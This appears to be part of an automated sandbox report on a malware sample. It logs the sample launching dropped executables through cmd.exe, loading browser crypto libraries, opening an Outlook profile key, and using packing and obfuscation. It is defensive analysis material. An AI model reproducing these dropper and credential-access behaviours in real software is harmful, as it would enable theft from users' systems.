Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process created: C:\Users\user\AppData\Local\Temp\1000006001\528307a0ac.exe "C:\Users\user\AppData\Local\Temp\1000006001\528307a0ac.exe"
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe" Jump to behavior
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\CFHDHIJDGC.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe "C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe Process created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe "C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process created: C:\Users\user\AppData\Local\Temp\1000006001\528307a0ac.exe "C:\Users\user\AppData\Local\Temp\1000006001\528307a0ac.exe" Jump to behavior
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Section loaded: shfolder.dll Jump to behavior
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Section loaded: mozglue.dll Jump to behavior
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Section loaded: wsock32.dll Jump to behavior
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Section loaded: msvcp140.dll Jump to behavior
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Section loaded: pcacli.dll Jump to behavior
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: dui70.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: duser.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: dwrite.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: windows.ui.immersive.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: bcp47mrm.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: uianimation.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: dxgi.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: resourcepolicyclient.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: d3d11.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: d3d10warp.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: dxcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: dcomp.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: dwmapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe Section loaded: mstask.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe Section loaded: dui70.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe Section loaded: duser.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe Section loaded: chartv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe Section loaded: oleacc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe Section loaded: atlthunk.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe Section loaded: wtsapi32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe Section loaded: windows.fileexplorer.common.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe Section loaded: explorerframe.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\528307a0ac.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\528307a0ac.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\528307a0ac.exe Section loaded: shfolder.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\528307a0ac.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\528307a0ac.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\528307a0ac.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\528307a0ac.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\528307a0ac.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\528307a0ac.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\528307a0ac.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\528307a0ac.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\528307a0ac.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\528307a0ac.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\528307a0ac.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\528307a0ac.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\528307a0ac.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\528307a0ac.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\528307a0ac.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\528307a0ac.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\528307a0ac.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\528307a0ac.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\528307a0ac.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 Jump to behavior
Source: Wf9qnVcbi8.exe Static file information: File size 2514944 > 1048576
Source: Wf9qnVcbi8.exe Static PE information: Raw size of .data is bigger than: 0x100000 < 0x222c00
Source: Binary string: mozglue.pdbP source: Wf9qnVcbi8.exe, 00000000.00000002.2226915116.000000006C5BD000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: nss3.pdb@ source: Wf9qnVcbi8.exe, 00000000.00000002.2227149641.000000006C77F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source: Binary string: nss3.pdb source: Wf9qnVcbi8.exe, 00000000.00000002.2227149641.000000006C77F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: mozglue.pdb source: Wf9qnVcbi8.exe, 00000000.00000002.2226915116.000000006C5BD000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr

Data Obfuscation
barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Unpacked PE file: 0.2.Wf9qnVcbi8.exe.5d0000.0.unpack Unknown_Section0:EW;Unknown_Section1:EW;Unknown_Section2:EW;Unknown_Section3:EW;Unknown_Section4:EW;.data:EW; vs Unknown_Section0:EW;Unknown_Section1:R;Unknown_Section2:W;Unknown_Section3:R;Unknown_Section4:EW;.data:EW;
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe Unpacked PE file: 7.2.IDGHDGIDAK.exe.aa0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;lwthcuux:EW;rgejpvgu:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;lwthcuux:EW;rgejpvgu:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Unpacked PE file: 9.2.explorti.exe.2f0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;lwthcuux:EW;rgejpvgu:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;lwthcuux:EW;rgejpvgu:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Unpacked PE file: 10.2.explorti.exe.2f0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;lwthcuux:EW;rgejpvgu:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;lwthcuux:EW;rgejpvgu:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Unpacked PE file: 12.2.explorti.exe.2f0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;lwthcuux:EW;rgejpvgu:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;lwthcuux:EW;rgejpvgu:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1000006001\528307a0ac.exe Unpacked PE file: 13.2.528307a0ac.exe.550000.0.unpack Unknown_Section0:EW;Unknown_Section1:EW;Unknown_Section2:EW;Unknown_Section3:EW;Unknown_Section4:EW;.data:EW; vs Unknown_Section0:EW;Unknown_Section1:R;Unknown_Section2:W;Unknown_Section3:R;Unknown_Section4:EW;.data:EW;
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Code function: 0_2_6C5AC410 LoadLibraryW,GetProcAddress,FreeLibrary, 0_2_6C5AC410
Entry point lies outside standard sections
Source: initial sample Static PE information: section where entry point is pointing to: .data
PE file contains an invalid checksum
Source: explorti.exe.7.dr Static PE information: real checksum: 0x1d911a should be: 0x1dfac2
Source: random[1].exe.12.dr Static PE information: real checksum: 0x0 should be: 0x26a15f
Source: Wf9qnVcbi8.exe Static PE information: real checksum: 0x0 should be: 0x26a15f
Source: amadka[1].exe.0.dr Static PE information: real checksum: 0x1d911a should be: 0x1dfac2
Source: 528307a0ac.exe.12.dr Static PE information: real checksum: 0x0 should be: 0x26a15f
Source: IDGHDGIDAK.exe.0.dr Static PE information: real checksum: 0x1d911a should be: 0x1dfac2
PE file contains sections with non-standard names
Source: Wf9qnVcbi8.exe Static PE information: section name:
Source: Wf9qnVcbi8.exe Static PE information: section name:
Source: Wf9qnVcbi8.exe Static PE information: section name:
Source: Wf9qnVcbi8.exe Static PE information: section name:
Source: Wf9qnVcbi8.exe Static PE information: section name:
Source: IDGHDGIDAK.exe.0.dr Static PE information: section name:
Source: IDGHDGIDAK.exe.0.dr Static PE information: section name: .idata
Source: IDGHDGIDAK.exe.0.dr Static PE information: section name:
Source: IDGHDGIDAK.exe.0.dr Static PE information: section name: lwthcuux
Source: IDGHDGIDAK.exe.0.dr Static PE information: section name: rgejpvgu
Source: IDGHDGIDAK.exe.0.dr Static PE information: section name: .taggant
Source: amadka[1].exe.0.dr Static PE information: section name:
Source: amadka[1].exe.0.dr Static PE information: section name: .idata
Source: amadka[1].exe.0.dr Static PE information: section name:
Source: amadka[1].exe.0.dr Static PE information: section name: lwthcuux
Source: amadka[1].exe.0.dr Static PE information: section name: rgejpvgu
Source: amadka[1].exe.0.dr Static PE information: section name: .taggant
Source: msvcp140.dll.0.dr Static PE information: section name: .didat
Source: msvcp140[1].dll.0.dr Static PE information: section name: .didat
Source: nss3.dll.0.dr Static PE information: section name: .00cfg
Source: nss3[1].dll.0.dr Static PE information: section name: .00cfg
Source: softokn3.dll.0.dr Static PE information: section name: .00cfg
Source: softokn3[1].dll.0.dr Static PE information: section name: .00cfg
Source: freebl3.dll.0.dr Static PE information: section name: .00cfg
Source: freebl3[1].dll.0.dr Static PE information: section name: .00cfg
Source: mozglue.dll.0.dr Static PE information: section name: .00cfg
Source: mozglue[1].dll.0.dr Static PE information: section name: .00cfg
Source: explorti.exe.7.dr Static PE information: section name:
Source: explorti.exe.7.dr Static PE information: section name: .idata
Source: explorti.exe.7.dr Static PE information: section name:
Source: explorti.exe.7.dr Static PE information: section name: lwthcuux
Source: explorti.exe.7.dr Static PE information: section name: rgejpvgu
Source: explorti.exe.7.dr Static PE information: section name: .taggant
Source: random[1].exe.12.dr Static PE information: section name:
Source: random[1].exe.12.dr Static PE information: section name:
Source: random[1].exe.12.dr Static PE information: section name:
Source: random[1].exe.12.dr Static PE information: section name:
Source: random[1].exe.12.dr Static PE information: section name:
Source: 528307a0ac.exe.12.dr Static PE information: section name:
Source: 528307a0ac.exe.12.dr Static PE information: section name:
Source: 528307a0ac.exe.12.dr Static PE information: section name:
Source: 528307a0ac.exe.12.dr Static PE information: section name:
Source: 528307a0ac.exe.12.dr Static PE information: section name:
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Code function: 0_2_6C57B536 push ecx; ret 0_2_6C57B549
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 12_2_0030D82C push ecx; ret 12_2_0030D83F
Source: C:\Users\user\AppData\Local\Temp\1000006001\528307a0ac.exe Code function: 13_2_039D66F9 push cs; retf 13_2_039D66FF
Source: C:\Users\user\AppData\Local\Temp\1000006001\528307a0ac.exe Code function: 13_2_039D61F0 push cs; retf 13_2_039D620B
Source: C:\Users\user\AppData\Local\Temp\1000006001\528307a0ac.exe Code function: 13_2_7F4B2940 push 7F4B0002h; ret 13_2_7F4B294F
Source: C:\Users\user\AppData\Local\Temp\1000006001\528307a0ac.exe Code function: 13_2_7F4B2640 push 7F4B0002h; ret 13_2_7F4B264F
Source: C:\Users\user\AppData\Local\Temp\1000006001\528307a0ac.exe Code function: 13_2_7F4B0B40 push 7F4B0002h; ret 13_2_7F4B0B4F
